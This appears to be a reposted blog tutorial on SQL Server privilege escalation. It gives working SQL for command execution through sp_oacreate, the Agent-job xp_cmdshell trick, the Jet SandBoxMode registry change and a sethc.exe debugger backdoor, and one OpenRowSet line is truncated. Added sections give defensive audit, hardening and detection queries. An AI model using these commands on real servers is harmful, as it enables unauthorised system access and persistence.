SQL Server from 0 to 1: Privilege Escalation
2024-01-08 13:50:41
xp_cmdshell privilege escalation
xp_cmdshell was already covered in the earlier section on writing a webshell, so it is not repeated here.
sp_oacreate privilege escalation
Enable:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
```
Disable:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;
```
Execute:
```sql
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'
```
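The defensive counterpart of the two sections above, added here as example code that is not part of the original post: it audits the server-level options that the xp_cmdshell and sp_oacreate techniques depend on, shows which Windows account any such command would run as, lists who can switch the options back on, and ends with the hardened settings (the post's enable script sets each option to 1; the corrected value is 0). It assumes SQL Server 2008 R2 SP1 or later (for sys.dm_server_services) and sysadmin rights.

```sql
-- Added defensive audit (not from the original post). Run as sysadmin.
SET NOCOUNT ON;

-- 1. Which risky surface-area options are currently enabled?
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'ENABLED - review'
            ELSE 'disabled' END AS status
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries',   -- required for OPENROWSET against Jet
               'Agent XPs');

-- 2. Which Windows account would xp_cmdshell / wscript.shell run as?
--    LocalSystem or a local administrator here is what turns a database
--    compromise into an operating-system compromise.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;

-- 3. Who could re-enable the options? sp_configure needs ALTER SETTINGS,
--    held implicitly by sysadmin and serveradmin, or granted explicitly.
SELECT r.name AS server_role, m.name AS member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
  AND m.name NOT LIKE '##%';               -- skip internal certificate logins

SELECT p.name AS grantee, sp.permission_name, sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS p ON p.principal_id = sp.grantee_principal_id
WHERE sp.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER');

-- 4. Hardened configuration: turn the three options off. 'show advanced
--    options' must be on to address them by name; switch it off again last.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;
```

Re-run the first query after the last statement; every row should read "disabled". Disabling the options is only half the fix: step 3 shows who can undo it, and step 2 shows the account whose privileges are actually at stake, which should be a dedicated low-privilege service account rather than LocalSystem.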
Sandbox privilege escalation
1. Write the value:
```sql
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
```
2. Read it back:
```sql
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode'
```
Meaning of the SandBoxMode parameter (the default is 2):
`0`: safe mode disabled for every owner
`1`: only within the permitted range
`2`: required only in Access mode
`3`: fully enabled
Run a command:
```sql
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\i
```
public (SQL Server Agent job)
```sql
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
```
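A detection query for the Agent-job technique above, added here as example code that is not part of the original post. It lists job steps whose command text references command-execution procedures or a non-T-SQL subsystem together with whether the job owner is a sysadmin, enumerates the msdb roles that allow job creation, pulls the last week of run history for the flagged jobs, and reads the Agent error log. It assumes SQL Server 2005 or later and read access to msdb; agent_datetime is an undocumented helper function shipped in msdb, and xp_readerrorlog's second argument (2 = Agent log) is likewise undocumented.

```sql
-- Added detection queries (not from the original post).
USE msdb;
SET NOCOUNT ON;

-- 1. Job steps that would execute operating-system commands, with owner context.
SELECT j.name AS job_name,
       SUSER_SNAME(j.owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid)) AS owner_is_sysadmin,
       j.date_created, j.enabled, j.delete_level,   -- delete_level 1 = self-deleting, as in the post
       js.step_id, js.subsystem, js.command
FROM dbo.sysjobs AS j
JOIN dbo.sysjobsteps AS js ON js.job_id = j.job_id
WHERE js.command LIKE '%xp_cmdshell%'
   OR js.command LIKE '%xp_execresultset%'
   OR js.command LIKE '%sp_oacreate%'
   OR js.command LIKE '%xp_regwrite%'
   OR js.subsystem IN ('CmdExec', 'PowerShell')
ORDER BY j.date_created DESC;

-- 2. Who may create or run jobs at all: membership of the msdb Agent roles.
SELECT r.name AS agent_role, m.name AS member, m.type_desc
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('SQLAgentUserRole', 'SQLAgentReaderRole', 'SQLAgentOperatorRole')
ORDER BY r.name, m.name;

-- 3. Run history (last 7 days) for jobs whose steps matched above.
SELECT j.name AS job_name,
       msdb.dbo.agent_datetime(h.run_date, h.run_time) AS ran_at,
       h.step_id, h.run_status, LEFT(h.message, 200) AS message
FROM dbo.sysjobhistory AS h
JOIN dbo.sysjobs AS j ON j.job_id = h.job_id
WHERE msdb.dbo.agent_datetime(h.run_date, h.run_time) >= DATEADD(day, -7, GETDATE())
  AND j.job_id IN (SELECT job_id FROM dbo.sysjobsteps
                   WHERE command LIKE '%xp_cmdshell%'
                      OR command LIKE '%xp_execresultset%'
                      OR subsystem IN ('CmdExec', 'PowerShell'))
ORDER BY ran_at DESC;

-- 4. The current SQL Server Agent log (log 0, type 2 = Agent). A job that was
--    created with @delete_level = 1 removes itself on success and so no longer
--    appears in sysjobs; its start and completion are still recorded here.
EXEC master.dbo.xp_readerrorlog 0, 2;
```

Query 1 is the one to schedule as a recurring check; a job whose owner is not a sysadmin yet whose step calls xp_cmdshell or xp_execresultset is exactly the pattern the post's script produces. Because that script deletes the job on success, query 4 (and forwarding the Agent log to a SIEM) is what catches it after the fact.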
xp_regwrite
```sql
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
```
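A read-back check for the two registry changes on this page (the Jet SandBoxMode value from the sandbox section and the Image File Execution Options debugger from this section), added as example code that is not part of the original post. It uses xp_regread, the undocumented extended procedure the sandbox section already calls, which requires sysadmin or an explicit EXECUTE grant. The list of accessibility binaries checked is an assumption made for this example; the Debugger value is read from the documented "Windows NT" key path.

```sql
-- Added defensive read-back of the registry values changed on this page
-- (not from the original post). Requires rights to execute xp_regread.
SET NOCOUNT ON;

-- 1. Jet sandbox mode: the post states the default is 2.
DECLARE @sandbox int;
BEGIN TRY
    EXEC master.dbo.xp_regread
         @rootkey    = 'HKEY_LOCAL_MACHINE',
         @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
         @value_name = 'SandBoxMode',
         @value      = @sandbox OUTPUT;
END TRY
BEGIN CATCH
    SET @sandbox = NULL;    -- key or value absent
END CATCH;

SELECT 'Jet SandBoxMode' AS item,
       @sandbox AS current_value,
       CASE WHEN @sandbox IS NULL THEN 'value absent (Jet 4.0 engine not present?)'
            WHEN @sandbox <> 2  THEN 'CHANGED from expected default 2 - investigate'
            ELSE 'default' END AS assessment;

-- 2. Image File Execution Options "Debugger" on accessibility binaries.
--    A Debugger value on any of these is almost never legitimate.
DECLARE @targets TABLE (exe sysname);
INSERT INTO @targets (exe)
VALUES ('sethc.exe'), ('utilman.exe'), ('osk.exe'), ('magnify.exe'), ('narrator.exe');

DECLARE @results TABLE (exe sysname, debugger nvarchar(512));
DECLARE @exe sysname, @key nvarchar(512), @debugger nvarchar(512);

DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT exe FROM @targets;
OPEN c;
FETCH NEXT FROM c INTO @exe;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\' + @exe;
    SET @debugger = NULL;
    BEGIN TRY
        EXEC master.dbo.xp_regread
             @rootkey    = 'HKEY_LOCAL_MACHINE',
             @key        = @key,
             @value_name = 'Debugger',
             @value      = @debugger OUTPUT;
    END TRY
    BEGIN CATCH
        SET @debugger = NULL;   -- no IFEO subkey for this binary: clean
    END CATCH;
    INSERT INTO @results (exe, debugger) VALUES (@exe, @debugger);
    FETCH NEXT FROM c INTO @exe;
END
CLOSE c;
DEALLOCATE c;

SELECT exe,
       ISNULL(debugger, '(none)') AS debugger,
       CASE WHEN debugger IS NULL THEN 'clean'
            ELSE 'DEBUGGER SET - investigate' END AS assessment
FROM @results;
```

The same values are visible from the host side in the Windows Registry auditing log (Object Access, key write events), which is where they should be alerted on; this script is for the case where the database server is the only vantage point available. Rights to xp_regwrite and xp_regread should be limited to sysadmin, and sysadmin itself limited to the accounts identified in the configuration audit.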
Source: https://blog.csdn.net/2301_80520893/article/details/135339463
This article was submitted by an internet user; the views expressed are solely the author's own and do not represent the position of this site. This site only provides information storage space services, does not own the content, and assumes no related legal liability. If the content infringes rights, is illegal or non-compliant, or is factually inaccurate, please contact 我的编程经验分享网 at veading@qq.com to file a complaint; once verified, it will be deleted immediately.